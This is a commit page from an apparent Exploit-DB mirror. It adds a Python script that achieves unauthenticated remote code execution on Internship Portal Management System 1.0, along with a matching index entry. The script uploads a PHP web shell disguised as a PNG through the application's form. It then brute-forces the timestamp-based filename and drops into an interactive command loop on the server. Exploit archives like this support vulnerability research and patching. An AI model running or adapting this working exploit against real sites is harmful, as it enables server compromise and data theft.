bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-05-05

Browse source 
1 changes to exploits/shellcodes

Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)
This commit is contained in:
Offensive Security 2021-05-05 05:01:52 +00:00
parent dcd1229758
commit b8cf9ea0fc
2 changed files with 75 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

74
exploits/php/webapps/49823.py Executable file
View file

@ -0,0 +1,74 @@
# Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)
# Date: 2021-05-04
# Exploit Author: argenestel
# Vendor Homepage: https://www.sourcecodester.com/php/11712/internship-portal-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11712&title=Internship+Portal+Management+System+using+PHP+with+Source+Code
# Version: 1.0
# Tested on: Debian 10
import requests
import time
#change the url to the site running the vulnerable system
url="http://127.0.0.1:4000"
#burp proxy
proxies = {
"http": "http://127.0.0.1:8080",
}
#payload
payload='<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'
#the upload point
insert_url=url+"/inserty.php"
def fill_details():
global payload
global shellend
global shellstart
print("Online Intern System 1.0 Exploit: Unauth RCE via File Upload")
#time start
shellstart=int(time.time())
#print(shellstart)
files = {'file':('shell.php',payload,
'image/png', {'Content-Disposition': 'form-data'}
)
}
data = {
"company_name":"some",
"first_name":"some",
"last_name":"some",
"email":"some@some.com",
"gender":"Male",
"insert_button":"Apply",
"terms":"on"
}
r = requests.post(insert_url, data=data, files=files)
if r.status_code == 200:
print("Exploited Intern System Successfully...")
shellend = int(time.time())
#print(shellend)
shell()
else:
print("Exploit Failed")
def shell():
for shellname in range(shellstart, shellend+1):
shellstr=str(shellname)
shell_url=url+"/upload/"+shellstr+"_shell.php"
r = requests.get(shell_url)
if r.status_code == 200:
shell_url=url+"/upload/"+shellstr+"_shell.php"
break
r = requests.get(shell_url)
if r.status_code == 200:
print("Shell Starting...")
while True:
cmd=input("cmd$ ")
r = requests.get(shell_url+"?cmd="+cmd)
print(r.text)
else:
print("File Name Error")
fill_details()

1
files_exploits.csv
View file

@ -43990,3 +43990,4 @@ id,file,description,date,author,type,platform,port
49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",2021-05-03,nu11secur1ty,webapps,php, 49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",2021-05-03,nu11secur1ty,webapps,php,
49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",2021-05-03,4D0niiS,webapps,ruby, 49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",2021-05-03,4D0niiS,webapps,ruby,
49822,exploits/ruby/webapps/49822.rb,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",2021-05-03,4D0niiS,webapps,ruby, 49822,exploits/ruby/webapps/49822.rb,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",2021-05-03,4D0niiS,webapps,ruby,
49823,exploits/php/webapps/49823.py,"Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)",2021-05-04,argenestel,webapps,php,

Can't render this file because it is too large.